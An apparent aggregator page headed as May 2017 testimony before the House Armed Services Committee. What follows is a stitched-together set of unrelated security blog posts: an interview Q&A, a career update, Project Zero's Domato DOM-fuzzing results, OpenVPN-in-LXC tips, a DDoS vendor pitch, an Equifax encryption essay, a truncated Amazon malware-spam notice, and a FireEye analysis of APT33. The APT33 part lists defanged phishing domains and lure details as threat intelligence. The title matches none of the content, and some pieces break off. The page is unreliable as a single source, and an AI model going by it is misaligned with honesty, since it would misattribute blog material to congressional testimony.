Testimony before the US House Committee on Armed Services (May 2017)

Src: Docs.House.Gov

Science of CyberSecurity: Latest Cyber Security Threats

As part of a profile interview for Science of Cybersecurity I was asked five questions on cyber security last week, here's question 5 of 5.

Q. What keeps you up at night in the context of the cyber environment that the world finds itself in?
The growing dependence on, and integration of, connected computers within our daily lives means we are embarking on an era where cyber attacks will endanger our lives. Networked and complex IT systems are inherently insecure, meaning it is open season for nation-states, cyber terrorists and the curious to attack these life-integrated emerging technologies, from driverless cars to the countless new home IoT devices. I fear it will only be a matter of time before a cyber attack causes human harm or even loss of life. The impact of the recent NHS ransomware attack serves as a warning: this cyber attack directly caused the closure of accident and emergency departments and the cancellation of operations. The future threats posed by artificial intelligence and quantum computing are also growing concerns for cyber security, and well worth keeping an eye on as these technologies continue to progress.

A Change In Context

Today marks the end of my first week in a new job. As of this past Monday, I am now a Manager, Security Engineering, with Pearson. I'll be handling a variety of responsibilities, initially mixed between security architecture and team management. I view this opportunity as a chance to reset my career after the myriad challenges experienced over the past decade. In particular, I will now finally be able to say I've had administrative responsibility for personnel, the lack of which has held me back from career progression these past few years.

This change is a welcome one, and it will also be momentous in that it will see us leaving the NoVA/DC area next Summer. The destination is not finalized, but it seems likely to be Denver. While it's not the same as being in Montana, it's the Rockies and at elevation, which sounds good to me. Not to mention I know several people in the area and, in general, like it. Which is not to say that we dislike where we live today (despite the high price tag). It's just time for a change of scenery.

I plan to continue writing on the side here (and on LinkedIn), but the pace of writing may slow again in the short-term while I dedicate most of my energy to ramping up the day job. The good news, however, is this will afford me the opportunity to continue getting "real world" experience that can be translated and related in a hopefully meaningful manner.

Until next time, thanks and good luck!

Science of CyberSecurity: What Cyber Security Blogs to Follow

As part of a profile interview for Science of Cybersecurity I was asked five questions on cyber security last week, here's question 4 of 5.


Q. Do you recommend a particular cyber security blog that our readers could follow?
Of course, my own IT Security Expert Blog, and my Twitter accounts @SecurityExpert and @SecurityToday, are well worth following. My two favourite blogs are Bruce Schneier’s blog (Bruce is a true rock star of the industry) and the Krebs on Security blog, which is also an excellent read; Brian provides the behind-the-scenes details of the latest hacking techniques and data breaches, and pulls no punches with his opinions. Both of these bloggers have written books that are a must-read for budding cyber security professionals as well.

The Great DOM Fuzz-off of 2017

Posted by Ivan Fratric, Project Zero

Introduction

Historically, DOM engines have been one of the largest sources of web browser bugs. And while in the recent years the popularity of those kinds of bugs in targeted attacks has somewhat fallen in favor of Flash (which allows for cross-browser exploits) and JavaScript engine bugs (which often result in very powerful exploitation primitives), they are far from gone. For example, CVE-2016-9079 (a bug that was used in November 2016 against Tor Browser users) was a bug in Firefox’s DOM implementation, specifically the part that handles SVG elements in a web page. It is also a rare case that a vendor will publish a security update that doesn’t contain fixes for at least several DOM engine bugs.

An interesting property of many of those bugs is that they are more or less easy to find by fuzzing. This is why a lot of security researchers as well as browser vendors who care about security invest into building DOM fuzzers and associated infrastructure.

As a result, after joining Project Zero, one of my first projects was to test the current state of resilience of major web browsers against DOM fuzzing.

The fuzzer

For this project I wanted to write a new fuzzer that takes some of the ideas from my previous DOM fuzzing projects, but also improves on them and implements new features. Starting from scratch also allowed me to end up with cleaner code that I’m open-sourcing together with this blog post. The goal was not to create anything groundbreaking - as already noted by security researchers, many DOM fuzzers have begun to look like each other over time. Instead, the goal was to create a fuzzer that has decent initial coverage, is easily understandable and extensible, and can be reused by myself as well as other researchers for fuzzing targets besides just the DOM.

We named this new fuzzer Domato (credits to Tavis for suggesting the name). Like most DOM fuzzers, Domato is generative, meaning that the fuzzer generates a sample from scratch given a set of grammars that describes HTML/CSS structure as well as various JavaScript objects, properties and functions.

The fuzzer consists of several parts:
  • The base engine that can generate a sample given an input grammar. This part is intentionally fairly generic and can be applied to other problems besides just DOM fuzzing.
  • The main script that parses the arguments and uses the base engine to create samples. Most logic that is DOM specific is captured in this part.
  • A set of grammars for generating HTML, CSS and JavaScript code.

One of the most difficult aspects in the generation-based fuzzing is creating a grammar or another structure that describes the samples that are going to be created. In the past I experimented with manually created grammars as well as grammars extracted automatically from web browser code. Each of these approaches has advantages and drawbacks, so for this fuzzer I decided to use a hybrid approach:

  1. I initially extracted DOM API declarations from .idl files in Google Chrome Source. Similarly, I parsed Chrome’s layout tests to extract common (and not so common) names and values of various HTML and CSS properties.
  2. Afterwards, this automatically extracted data was heavily manually edited to make the generated samples more likely to trigger interesting behavior. One example of this are functions and properties that take strings as input: Just because a DOM property takes a string as an input does not mean that any string would have a meaning in the context of that property.
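The generative core of such a fuzzer can be illustrated with a toy grammar expander (a simplified sketch only; Domato's actual grammar format is documented in its repository and differs from this):

```python
import random
import re

# Toy grammar: uppercase symbols are non-terminals; each maps to a
# list of alternative productions that may contain further non-terminals.
GRAMMAR = {
    "ELEM":  ["<div ATTR>CHILD</div>", "<span ATTR>CHILD</span>"],
    "ATTR":  ['id="a"', 'class="b"'],
    "CHILD": ["text", "ELEM"],
}

def generate(symbol="ELEM", depth=0):
    """Recursively expand a symbol into a concrete sample string."""
    if symbol not in GRAMMAR:
        return symbol  # terminal
    choices = GRAMMAR[symbol]
    if depth > 3:
        # Bias away from recursion as nesting grows so samples stay finite.
        choices = [c for c in choices if "ELEM" not in c] or choices
    production = random.choice(choices)
    # Expand every non-terminal occurring in the chosen production.
    return re.sub(r"ELEM|ATTR|CHILD",
                  lambda m: generate(m.group(0), depth + 1),
                  production)

print(generate())  # e.g. nested <div>/<span> markup with random attributes
```

A real grammar describes hundreds of elements, CSS properties, and JavaScript API calls in the same spirit, and the hand-editing step described above amounts to curating those production lists.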

Otherwise, Domato supports features that you’d expect from a DOM fuzzer such as:
  • Generating multiple JavaScript functions that can be used as targets for various DOM callbacks and event handlers
  • Implicit (through grammar definitions) support for “interesting” APIs (e.g. the Range API) that have historically been prone to bugs.

Instead of going into much technical detail here, the reader is referred to the fuzzer code and documentation at https://github.com/google/domato. It is my hope that by open-sourcing the fuzzer I will invite community contributions covering the areas I might have missed in the fuzzer or grammar creation.

Setup

We tested the 5 browsers with the highest market share: Google Chrome, Mozilla Firefox, Internet Explorer, Microsoft Edge and Apple Safari. We gave each browser approximately 100,000,000 iterations with the fuzzer and recorded the crashes. (If we fuzzed some browsers for longer than 100,000,000 iterations, only the bugs found within this number of iterations were counted in the results.) Running this number of iterations would take too long on a single machine and thus requires fuzzing at scale, but it is still well within the budget of a determined attacker. For reference, it can be done for about $1k on Google Compute Engine given the smallest possible VM size, preemptible VMs (which I think work well for fuzzing jobs as they don’t need to be up all the time) and 10 seconds per run.
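That back-of-the-envelope estimate can be reproduced in a few lines of arithmetic (the preemptible hourly price below is an assumed, illustrative figure, not quoted GCE pricing):

```python
ITERATIONS = 100_000_000
SECONDS_PER_RUN = 10
# Assumed price for the smallest preemptible GCE VM (illustrative only;
# actual pricing varies by region and changes over time).
PRICE_PER_VM_HOUR = 0.0035  # USD

vm_hours = ITERATIONS * SECONDS_PER_RUN / 3600  # ~277,778 VM-hours total
cost = vm_hours * PRICE_PER_VM_HOUR
print(f"~${cost:,.0f}")  # on the order of $1k, matching the estimate above
```

Since the runs are independent, the same total spend applies whether the work is spread over hundreds of VMs for days or fewer VMs for longer.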

Here are additional details of the fuzzing setup for each browser:

  • Google Chrome was fuzzed on an internal Chrome Security fuzzing cluster called ClusterFuzz. To fuzz Google Chrome on ClusterFuzz we simply needed to upload the fuzzer and it was run automatically against various Chrome builds.

  • Mozilla Firefox was fuzzed on internal Google infrastructure (linux based). Since Mozilla already offers Firefox ASAN builds for download, we used that as a fuzzing target. Each crash was additionally verified against a release build.

  • Internet Explorer 11 was fuzzed on Google Compute Engine running Windows Server 2012 R2 64-bit. Given the lack of ASAN build, page heap was applied to iexplore.exe process to make it easier to catch some types of issues.

  • Microsoft Edge was the only browser we couldn’t easily fuzz on Google infrastructure since Google Compute Engine doesn’t support Windows 10 at this time and Windows Server 2016 does not include Microsoft Edge. That’s why for fuzzing it we created a virtual cluster of Windows 10 VMs on Microsoft Azure. Same as with Internet Explorer, page heap was applied to MicrosoftEdgeCP.exe process before fuzzing.

  • Instead of fuzzing Safari directly, which would require Apple hardware, we instead used WebKitGTK+ which we could run on internal (Linux-based) infrastructure. We created an ASAN build of the release version of WebKitGTK+. Additionally, each crash was verified against a nightly ASAN WebKit build running on a Mac.

Results

Without further ado, the number of security bugs found in each browser is captured in the table below.

Only security bugs were counted in the results (doing anything else is tricky as some browser vendors fix non-security crashes while some don’t) and only bugs affecting the currently released version of the browser at the time of fuzzing were counted (as we don’t know if bugs in development version would be caught by internal review and fuzzing process before release).

Vendor    | Browser           | Engine   | Number of Bugs | Project Zero Bug IDs
----------|-------------------|----------|----------------|---------------------
Google    | Chrome            | Blink    | 2              | 994, 1024
Mozilla   | Firefox           | Gecko    | 4**            | 1130, 1155, 1160, 1185
Microsoft | Internet Explorer | Trident  | 4              | 1011, 1076, 1118, 1233
Microsoft | Edge              | EdgeHtml | 6              | 1011, 1254, 1255, 1264, 1301, 1309
Apple     | Safari            | WebKit   | 17             | 999, 1038, 1044, 1080, 1082, 1087, 1090, 1097, 1105, 1114, 1241, 1242, 1243, 1244, 1246, 1249, 1250
Total     |                   |          | 31*            |
*While adding up the per-browser numbers gives 33, 2 of the bugs affected multiple browsers
**The root cause of one of the bugs found in Mozilla Firefox was in the Skia graphics library and not in Mozilla source. However, since the relevant code was contributed by Mozilla engineers, I consider it fair to count here.

All of the bugs listed here have been fixed in the current shipping versions of the browsers. As can be seen in the table, most browsers did relatively well in the experiment, with only a couple of security-relevant crashes found. Since the same methodology resulted in a significantly higher number of issues just several years ago, this shows clear progress for most of the web browsers. For most of the browsers the differences are not sufficiently statistically significant to justify saying that one browser’s DOM engine is better or worse than another.

However, Apple Safari is a clear outlier in the experiment, with a significantly higher number of bugs found. This is especially worrying given attackers’ interest in the platform as evidenced by the exploit prices and recent targeted attacks. It is also interesting to compare Safari’s results to Chrome’s, as until a couple of years ago they were using the same DOM engine (WebKit). It appears that after the Blink/WebKit split either the number of bugs in Blink got significantly reduced or a significant number of bugs got introduced in the new WebKit code (or both). To attempt to address this discrepancy, I reached out to Apple Security proposing to share the tools and methodology. When one of the Project Zero members decided to transfer to Apple, he contacted me and asked if the offer was still valid. So Apple received a copy of the fuzzer and will hopefully use it to improve WebKit.

It is also interesting to observe the effect of MemGC, a use-after-free mitigation in Internet Explorer and Microsoft Edge. When this mitigation is disabled using the registry flag OverrideMemoryProtectionSetting, a lot more bugs appear. However, Microsoft considers these bugs strongly mitigated by MemGC and I agree with that assessment. Given that IE used to be plagued with use-after-free issues, MemGC is an example of a useful mitigation that results in a clear positive real-world impact. Kudos to Microsoft’s team behind it!

When interpreting the results, it is very important to note that they don’t necessarily reflect the security of the whole browser and instead focus on just a single component (the DOM engine), but one that has historically been a source of many security issues. This experiment does not take into account other aspects such as the presence and security of a sandbox, bugs in other components such as scripting engines, etc. I also cannot disregard the possibility that, within the DOM, my fuzzer is more capable of finding certain types of issues than others, which might have an effect on the overall stats.

Experimenting with coverage-guided DOM fuzzing

Since coverage-guided fuzzing seems to produce very good results in other areas, we wanted to combine it with DOM fuzzing. We built an experimental coverage-guided DOM fuzzer and ran it against Internet Explorer. IE was selected as a target both because of the author's familiarity with it and because it is very easy to limit coverage collection to just the DOM component (mshtml.dll). The experimental fuzzer used a modified Domato engine to generate mutations and a modified version of WinAFL's DynamoRIO client to measure coverage. The fuzzing flow worked roughly as follows:

  1. The fuzzer generates a new set of samples by mutating existing samples in the corpus.
  2. The fuzzer spawns an IE process which opens a harness HTML page.
  3. The harness HTML page instructs the fuzzer to start measuring coverage and loads one of the samples in an iframe.
  4. After the sample executes, it notifies the harness, which notifies the fuzzer to stop collecting coverage.
  5. The coverage map is examined and, if it contains unseen coverage, the corresponding sample is added to the corpus.
  6. Go to step 3 until all samples are executed or the IE process crashes.
  7. Periodically minimize the corpus using AFL’s cmin algorithm.
  8. Go to step 1.
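The loop above can be sketched in simplified form (a toy model: "coverage" is faked with token sets, and mutation and minimization are crude stand-ins for the real Domato and cmin machinery):

```python
import random

def mutate(sample):
    # Toy mutation: append a random token (stands in for adding a CSS rule,
    # an HTML element, or a line of JavaScript to the sample).
    return sample + [random.randint(0, 99)]

def run_and_collect_coverage(sample):
    # Toy target: pretend each distinct token exercises one basic block.
    # The real fuzzer measured coverage in mshtml.dll via WinAFL/DynamoRIO.
    return set(sample)

def fuzz(initial_corpus, rounds=50):
    corpus = [list(s) for s in initial_corpus]
    seen = set()
    for _ in range(rounds):                        # steps 1 and 8
        for parent in list(corpus):
            child = mutate(parent)                 # step 1
            cov = run_and_collect_coverage(child)  # steps 2-4
            if cov - seen:                         # step 5: unseen coverage?
                seen |= cov
                corpus.append(child)
        # step 7: crude stand-in for AFL's cmin - drop exact duplicates
        corpus = [list(t) for t in {tuple(s) for s in corpus}]
    return corpus, seen

corpus, seen = fuzz([[1], [2]])
```

Even in this toy, the corpus stops growing once no mutation yields new coverage, which mirrors the coverage plateau observed in the real experiment.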

The following set of mutations was used to produce new samples from the existing ones:

  • Adding new CSS rules
  • Adding new properties to the existing CSS rules
  • Adding new HTML elements
  • Adding new properties to the existing HTML elements
  • Adding new JavaScript lines. The new lines would be aware of the existing JavaScript variables and could thus reuse them.

Unfortunately, while we did see a steady increase in the collected coverage over time while running the fuzzer, it did not result in any new crashes (i.e. crashes that would not be discovered using dumb fuzzing). It would appear more investigation is required in order to combine coverage information with DOM fuzzing in a meaningful way.

Conclusion

As stated before, DOM engines have been one of the largest sources of web browser bugs. While these types of bugs are far from gone, most browsers show clear progress in this area. The results also highlight the importance of doing continuous security testing, as bugs get introduced with new code and a relatively short period of development can significantly deteriorate a product’s security posture.

The big question at the end is: Are we now at a stage where it is more worthwhile to look for security bugs manually than via fuzzing? Or do more targeted fuzzers need to be created instead of using generic DOM fuzzers to achieve better results? And if we are not there yet - will we be there soon (hopefully)? The answer certainly depends on the browser and the person in question. Instead of attempting to answer these questions myself, I would like to invite the security community to let us know their thoughts.

Tips / Solutions for setting up OpenVPN on Debian 9 within Proxmox / LXC containers

When I tried to migrate my OpenVPN setup to a container on my new Proxmox server I ran into multiple problems, and searching the Internet turned up solutions that did not work or were out of date. So I thought I'd put everything one needs to set up OpenVPN on Debian 9 within a Proxmox / LXC container together in one blog post.

 

Getting a TUN device into the unprivileged container

As you really should run containers in unprivileged mode, the typical solutions of adding/allowing

lxc.cgroup.devices.allow: c 10:200 rwm

won’t work. And running a container in privileged mode is a bad, bad idea, but thankfully there is a native LXC solution.

Stop the container with

pct stop <containerid>

Add following line to /etc/pve/lxc/<containerid>.conf

lxc.mount.entry = /dev/net/tun dev/net/tun none bind,create=file

Start the container with

pct start <containerid>

OpenVPN will now be able to create a tun device. Just do a test run with

openvpn --config /etc/openvpn/blabla.conf

 

Add OpenVPN config files to the “autostart”

You need to put the OpenVPN config files into /etc/openvpn/ with the extension .conf. If you add a new file, you need to run

systemctl daemon-reload

before doing a service openvpn restart.

Changes in existing config files don’t need the systemd reload.

 

Getting systemd to start OpenVPN within an unprivileged container

So OpenVPN now works manually, but not via its systemd service. You see the following error message in the log file:

daemon() failed or unsupported: Resource temporarily unavailable (errno=11)

To solve this, edit

/lib/systemd/system/openvpn@.service

and put a # in front of

LimitNPROC=10

Now reload systemd with

systemctl daemon-reload

and it should work.
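As an alternative to commenting out the limit in the packaged unit file (which a future openvpn package upgrade may overwrite), the same effect can be achieved with a systemd drop-in override; a sketch:

```shell
# Creates /etc/systemd/system/openvpn@.service.d/override.conf without
# touching the packaged unit file, so the change survives upgrades:
systemctl edit openvpn@.service
# In the editor that opens, add:
#   [Service]
#   LimitNPROC=infinity
# then save, and reload systemd:
systemctl daemon-reload
```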

 

Hope these tips helped you solve the problems faster than I did. 🙂 If you know other tips / solutions for running OpenVPN in a Debian 9 container within LXC / Proxmox, write a comment! Thx!

Enterprise Security Weekly #62 – Heat Death of the Universe

Paul and John discuss insights into the Equifax data breach. In the news, CyberGRX and BitSight join forces, YARA rules explained, Riverbed teases an application networking offering, and more on this episode of Enterprise Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/ES_Episode62

Visit https://www.securityweekly.com/esw for all the latest episodes!

Malware spam: "Invoice RE-2017-09-21-00xxx" from "Amazon Marketplace"

This fake Amazon spam comes with a malicious attachment:

Subject: Invoice RE-2017-09-21-00794
From: "Amazon Marketplace" [yAhbPDAoufvZE@marketplace.amazon.co.uk]
Date: Thu, September 21, 2017 9:21 am
Priority: Normal

------------- Begin message -------------

Dear customer, We want to use this opportunity to first say "Thank you very much for your purchase!"

“Everyday” DDoS Attacks Must Be Mitigated

At last week’s CLOUDSEC 2017 conference, Corero CEO Ashley Stephenson spoke to attendees about the importance of mitigating the “everyday” small-scale distributed denial of service (DDoS) attacks that are pervasive and harmful to global businesses. Although massive volumetric attacks continue to make headline news, and such attacks are likely to get even more massive in scale, it is the short, frequent, low-threshold DDoS attacks that commonly affect businesses.

In our recent 2017 DDoS trends report, Corero found that fully 80% of DDoS attacks among our customers are less than 1Gbps in size, and 71% of attacks last less than 10 minutes. Simultaneously, we found that slightly larger (not massive, however) attacks in the realm of 10Gbps comprised only 1.7% of all attacks.

Small Scale DDoS Attacks Are Cause For Concern

The prevalence of low-threshold, sub-saturating attacks should warrant just as much concern as volumetric attacks. After all, it is not as if hackers cannot launch large-scale attacks, but rather that they choose to launch smaller attacks because smaller attacks often go undetected, and often serve as a smokescreen for more damaging cyberattacks. A small DDoS attack can take down a company’s firewall in a matter of seconds, thus enabling the hacker to infiltrate and map a company’s network, possibly installing malware. Even if the hacker does not infiltrate the network, the DDoS traffic creates “noise” on the network, thus degrading service and performance. For Internet service providers and hosting providers this is a major concern, because the sub-saturating attacks steal bandwidth; any DDoS traffic traversing their network is costly in terms of their network infrastructure resources and maintenance.

The Bottom Line

Small attacks are usually unnoticed—and therefore, not blocked—by cloud-based DDoS scrubbing solutions. If the IT security staff does notice a small attack, it takes several minutes to swing the traffic out to a scrubbing service. In contrast, Corero’s automated DDoS protection solution detects such low-threshold attacks immediately, and blocks them in less than 1 second.

Click here to view Stephenson’s slide presentation from CLOUDSEC 2017.

Corero has been a leader in DDoS protection for several years. Contact us to learn more about how we can protect your business.

Encryption would NOT have saved Equifax

I read a few articles this week suggesting that the big question for Equifax is whether or not their data was encrypted. The State of Massachusetts, speaking about the lawsuit it filed, said that Equifax "didn't put in safeguards like encryption that would have protected the data." Unfortunately, encryption, as it's most often used in these scenarios, would not have actually prevented the exposure of this data. This breach will have an enormous impact, so we should be careful to get the facts right and provide as much education as possible to law makers and really to anyone else affected.

We know that the attack took advantage of a flaw in Apache Struts (that should have been patched). Struts is a framework for building applications. It lives at the application tier. The data, obviously, resides at the data tier. Once the application was compromised, it really doesn't matter if the data was encrypted because the application is allowed to access (and therefore to decrypt) the data.

I won't get into all the various encryption techniques that are possible but there are two common types of data encryption for these types of applications. There's encryption of data in motion so that nobody can eavesdrop on the conversation as data moves between tiers or travels to the end users. And there's encryption of data at rest that protects data as it's stored on disk so that nobody can pick up the physical disk (or the data file, depending on how the encryption is applied) and access the data. Once the application is authenticated against the database and runs a query against the data, it is able to access, view, and act upon the data even if the data was encrypted while at rest.

Note that there is a commonly-applied technique that applies at-rest encryption at the application tier. I don't want to confuse the conversation with too much detail, but it usually involves inserting some code into the application to encrypt/decrypt. I suspect that if the application is compromised then app-tier encryption would have been equally unhelpful.

The bottom line here is that information security requires a broad, layered defense strategy. There are numerous types of attacks. A strong security program addresses as many potential attack vectors as possible within reason. (My use of "within reason" is a whole other conversation. Security strategies should evaluate risk in terms of likelihood of an attack and the damage that could be caused.) I already wrote about a layered approach to data protection within the database tier. But that same approach of layering security applies to application security (and information security in general). You have to govern the access controls, ensure strong enough authentication, understand user context, identify anomalous behavior, encrypt data, and, of course, patch your software and maintain your infrastructure. This isn't a scientific analysis. I'm just saying that encryption isn't a panacea and probably wouldn't have helped at all in this case.
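As a toy illustration of why transparent at-rest encryption does not help once the application tier is compromised (base64 stands in for real encryption here, and the credential string is made up):

```python
from base64 import b64encode, b64decode

# Toy stand-in for transparent at-rest encryption: the "disk" holds
# encoded bytes, but any caller presenting the application's database
# credential gets plaintext back automatically.
DISK = {}

def store(key, value):
    DISK[key] = b64encode(value.encode())       # "encrypted" at rest

def query(key, credentials):
    if credentials != "app-db-password":        # made-up app credential
        raise PermissionError("not authenticated")
    return b64decode(DISK[key]).decode()        # decryption is transparent

store("ssn:123", "078-05-1120")
# An attacker who compromises the application tier (e.g. via the Struts
# flaw) runs queries *as the application*, so at-rest encryption is
# transparently undone for them:
print(query("ssn:123", "app-db-password"))      # the plaintext comes back
```

The bytes on "disk" were never stored in the clear, yet the compromised application path yields plaintext anyway, which is the scenario Equifax faced.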

Equifax says that their "security organization was aware of this vulnerability at that time, and took efforts to identify and to patch any vulnerable systems in the company's IT infrastructure." Clearly, humans need to rely on technology to help identify what systems exist in the environment, what software is installed, which versions, etc. I have no idea what tools Equifax might have used to scan their environment. Maybe the tool failed to find this install. But their use of "at that time" bothers me too. We can't rely on point-in-time assessments. We need continuous evaluations on a never ending cycle. We need better intelligence around our IT infrastructures. And as more workloads move to cloud, we need a unified approach to IT configuration compliance that works across company data centers and multi-cloud environments.

100% protection may be impossible. The best we can do is weigh the risks and apply as much security as possible to mitigate those risks. We should also all be moving to a continuous compliance model where we are actively assessing and reassessing security in real time. And again... layer, layer, layer.

Science of CyberSecurity: Where to get CyberSecurity Science

As part of a profile interview for Science of Cybersecurity I was asked five questions on cyber security last week, here's question 3 of 5.

Q. Where do you go to find your “science” of cybersecurity?
While cyber security controls appear simple to follow in policy statements and best practice guides, the reality is they are not always easy to implement across diverse organisations. When attempting to resolve complex security problems it can be easy for security professionals to lose sight of the goal of cyber security. To keep clarity, I think it helps to strip away the technology from the problem and learn the security science and lessons from history. So reading military strategy books like Sun Tzu’s “The Art of War” can improve how you think about and assess the cyber adversaries facing the organisation. Delving into the science of psychology is invaluable when seeking to bring about effective and positive staff security awareness and behavioural changes in the workplace.

Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware

When discussing suspected Middle Eastern hacker groups with destructive capabilities, many automatically think of the suspected Iranian group that previously used SHAMOON – aka Disttrack – to target organizations in the Persian Gulf. However, over the past few years, we have been tracking a separate, less widely known suspected Iranian group with potential destructive capabilities, whom we call APT33. Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013. We assess APT33 works at the behest of the Iranian government.

Recent investigations by FireEye’s Mandiant incident response consultants combined with FireEye iSIGHT Threat Intelligence analysis have given us a more complete picture of APT33’s operations, capabilities, and potential motivations. This blog highlights some of our analysis. Our detailed report on FireEye MySIGHT contains a more thorough review of our supporting evidence and analysis. We will also be discussing this threat group further during our webinar on Sept. 21 at 8 a.m. ET.

Targeting

APT33 has targeted organizations – spanning multiple industries – headquartered in the United States, Saudi Arabia and South Korea. APT33 has shown particular interest in organizations in the aviation sector involved in both military and commercial capacities, as well as organizations in the energy sector with ties to petrochemical production.

From mid-2016 through early 2017, APT33 compromised a U.S. organization in the aerospace sector and targeted a business conglomerate located in Saudi Arabia with aviation holdings.

During the same time period, APT33 also targeted a South Korean company involved in oil refining and petrochemicals. More recently, in May 2017, APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company.

We assess that the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may be looking to gain insights into Saudi Arabia’s military aviation capabilities to enhance Iran’s domestic aviation capabilities or to support Iran’s military and strategic decision making vis-à-vis Saudi Arabia.

We believe the targeting of the Saudi organization may have been an attempt to gain insight into regional rivals, while the targeting of South Korean companies may be due to South Korea’s recent partnerships with Iran’s petrochemical industry as well as South Korea’s relationships with Saudi petrochemical companies. Iran has expressed interest in growing its petrochemical industry and has often positioned this expansion as competition with Saudi petrochemical companies. APT33 may have targeted these organizations as a result of Iran’s desire to expand its own petrochemical production and improve its competitiveness within the region.

The generalized targeting of organizations involved in energy and petrochemicals mirrors previously observed targeting by other suspected Iranian threat groups, indicating a common interest in the sectors across Iranian actors.

Figure 1 shows the global scope of APT33 targeting.


Figure 1: Scope of APT33 Targeting

Spear Phishing

APT33 sent spear phishing emails to employees whose jobs related to the aviation industry. These emails included recruitment themed lures and contained links to malicious HTML application (.hta) files. The .hta files contained job descriptions and links to legitimate job postings on popular employment websites that would be relevant to the targeted individuals.

An example .hta file excerpt is provided in Figure 2. To the user, the file would appear as benign references to legitimate job postings; however, unbeknownst to the user, the .hta file also contained embedded code that automatically downloaded a custom APT33 backdoor.


Figure 2: Excerpt of an APT33 malicious .hta file

We assess APT33 used a built-in phishing module within the publicly available ALFA TEaM Shell (aka ALFASHELL) to send hundreds of spear phishing emails to targeted individuals in 2016. Many of the phishing emails appeared legitimate – they referenced a specific job opportunity and salary, provided a link to the spoofed company’s employment website, and even included the spoofed company’s Equal Opportunity hiring statement. However, in a few cases, APT33 operators left in the default values of the shell’s phishing module. These appear to be mistakes, as minutes after sending the emails with the default values, APT33 sent emails to the same recipients with the default values removed.

As shown in Figure 3, the “fake mail” phishing module in the ALFA Shell contains default values, including the sender email address (solevisible@gmail[.]com), subject line (“your site hacked by me”), and email body (“Hi Dear Admin”).


Figure 3: ALFA TEaM Shell v2-Fake Mail (Default)

Figure 4 shows an example email containing the default values of the shell’s phishing module.


Figure 4: Example Email Generated by the ALFA Shell with Default Values

Domain Masquerading

APT33 registered multiple domains that masquerade as Saudi Arabian aviation companies and Western organizations that together have partnerships to provide training, maintenance and support for Saudi’s military and commercial fleet. Based on observed targeting patterns, APT33 likely used these domains in spear phishing emails to target victim organizations.    

The following domains masquerade as these organizations: Boeing, Alsalam Aircraft Company, Northrop Grumman Aviation Arabia (NGAAKSA), and Vinnell Arabia.

boeing.servehttp[.]com

alsalam.ddns[.]net

ngaaksa.ddns[.]net

ngaaksa.sytes[.]net

vinnellarabia.myftp[.]org

Boeing, Alsalam Aircraft Company, and Saudia Aerospace Engineering Industries entered into a joint venture to create the Saudi Rotorcraft Support Center in Saudi Arabia in 2015 with the goal of servicing Saudi Arabia’s rotorcraft fleet and building a self-sustaining workforce in the Saudi aerospace supply base.

Alsalam Aircraft Company also offers military and commercial maintenance, technical support, and interior design and refurbishment services.

Two of the domains appeared to mimic Northrop Grumman joint ventures. These joint ventures – Vinnell Arabia and Northrop Grumman Aviation Arabia – provide aviation support in the Middle East, specifically in Saudi Arabia. Both Vinnell Arabia and Northrop Grumman Aviation Arabia have been involved in contracts to train Saudi Arabia’s Ministry of National Guard.

Identified Persona Linked to Iranian Government

We identified APT33 malware tied to an Iranian persona who may have been employed by the Iranian government to conduct cyber threat activity against its adversaries.

We assess that an actor using the handle “xman_1365_x” may have been involved in the development and potential use of APT33’s TURNEDUP backdoor, due to the inclusion of the handle in the program database (PDB) paths of many TURNEDUP samples. An example can be seen in Figure 5.


Figure 5: “xman_1365_x" PDB String in TURNEDUP Sample
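Pivoting on PDB debug paths is a common way to cluster samples by developer. As a rough illustration (the sample bytes and path below are hypothetical, not taken from an actual TURNEDUP binary), a handle embedded in a path can be surfaced with a simple printable-string scan:

```python
import re

# Printable ASCII runs that end in ".pdb" -- a crude but effective way to
# surface debug paths (and any embedded developer handle) in raw sample bytes.
PDB_PATH = re.compile(rb"[ -~]{5,}\.pdb")

def pdb_paths(sample: bytes) -> list:
    """Return every PDB debug path found in a sample's raw bytes."""
    return [m.group().decode("ascii") for m in PDB_PATH.finditer(sample)]

# Hypothetical bytes; real PE files carry the path in the debug directory.
data = b"\x00\x00C:\\Users\\xman_1365_x\\Desktop\\Release\\backdoor.pdb\x00"
print(pdb_paths(data))
```

A proper parser would walk the PE debug directory instead of scanning raw bytes, but the string scan works even on corrupt or packed-then-dumped samples.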

Xman_1365_x was also a community manager in the Barnamenevis Iranian programming and software engineering forum, and registered accounts in the well-known Iranian Shabgard and Ashiyane forums, though we did not find evidence to suggest that this actor was ever a formal member of the Shabgard or Ashiyane hacktivist groups.

Open source reporting links the “xman_1365_x” actor to the “Nasr Institute,” which is purported to be equivalent to Iran’s “cyber army” and controlled by the Iranian government. Separately, additional evidence ties the “Nasr Institute” to the 2011-2013 attacks on the financial industry, a series of denial of service attacks dubbed Operation Ababil. In March 2016, the U.S. Department of Justice unsealed an indictment that named two individuals allegedly hired by the Iranian government to build attack infrastructure and conduct distributed denial of service attacks in support of Operation Ababil. While the individuals and the activity described in the indictment are different from what is discussed in this report, it provides some evidence that individuals associated with the “Nasr Institute” may have ties to the Iranian government.

Potential Ties to Destructive Capabilities and Comparisons with SHAMOON

One of the droppers used by APT33, which we refer to as DROPSHOT, has been linked to the wiper malware SHAPESHIFT. Open source research indicates SHAPESHIFT may have been used to target organizations in Saudi Arabia.

Although we have only directly observed APT33 use DROPSHOT to deliver the TURNEDUP backdoor, we have identified multiple DROPSHOT samples in the wild that drop SHAPESHIFT. The SHAPESHIFT malware is capable of wiping disks, erasing volumes and deleting files, depending on its configuration. Both DROPSHOT and SHAPESHIFT contain Farsi language artifacts, which indicates they may have been developed by a Farsi language speaker (Farsi is the predominant and official language of Iran).

While we have not directly observed APT33 use SHAPESHIFT or otherwise carry out destructive operations, APT33 is the only group that we have observed use the DROPSHOT dropper. It is possible that DROPSHOT may be shared amongst Iran-based threat groups, but we do not have any evidence that this is the case.

